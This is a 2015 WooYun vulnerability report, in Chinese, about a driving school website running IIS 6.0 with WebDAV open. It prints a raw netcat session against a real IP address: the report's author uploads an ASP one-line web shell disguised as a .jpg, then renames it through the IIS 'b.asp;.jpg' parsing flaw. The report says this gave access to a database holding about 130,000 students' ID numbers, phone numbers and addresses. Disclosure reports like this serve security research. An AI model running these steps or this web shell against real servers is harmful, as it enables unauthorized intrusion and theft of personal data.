当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131966

漏洞标题:综安驾校命令执行漏洞可getshell泄露学员信息考试成绩与教练信息等数据

相关厂商:综安驾校

漏洞作者: ksss

提交时间:2015-08-07 13:09

修复时间:2015-09-21 13:10

公开时间:2015-09-21 13:10

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-09-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

综安驾校命令执行漏洞可getshell泄露学员信息考试成绩与教练信息等数据

详细说明:

QQ截图20150805212833.png


网站使用了web dav协议使用户可以直接对网站文件进行操作,导致了命令执行。
摸清了协议后,架起nc

QQ截图20150805213131.png


可以看到dav的关键字,直接put一个shell是不行的,限制了可写文件后缀
看了一下是iis6.0的,可以用解析漏洞,先写一个jpg

E:\workdesk\tools>nc.exe 113.108.111.235 80
OPTIONS / HTTP/1.1
Host: 113.108.111.235
HTTP/1.1 200 OK
Date: Wed, 05 Aug 2015 13:34:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIN
D, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Cache-Control: private
PUT /kaoshi/css/b.jpg HTTP/1.1
Host:113.108.111.235
Content-Length:23
<%eval request("a")%>
HTTP/1.1 201 Created
Date: Wed, 05 Aug 2015 13:34:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://113.108.111.235/kaoshi/css/b.jpg
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH,
SEARCH, LOCK, UNLOCK


文件写入成功,网站使用者不需要验证身份就可以进行文件读写。

QQ图片20150805213609.png


用move命令创建一个b.asp;.jpg的文件

QQ图片20150805213728.png


看一下数据库,存有老师及公司车辆考试成绩等等数据

QQ图片20150805213728.png


还包含十三万学员的身份证、手机、住址、成绩等等详细信息

QQ图片20150805214034.png

漏洞证明:

QQ图片20150805213609.png

QQ图片20150805213728.png

修复方案:

打webdav远程命令执行的补丁

版权声明:转载请注明来源 ksss@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝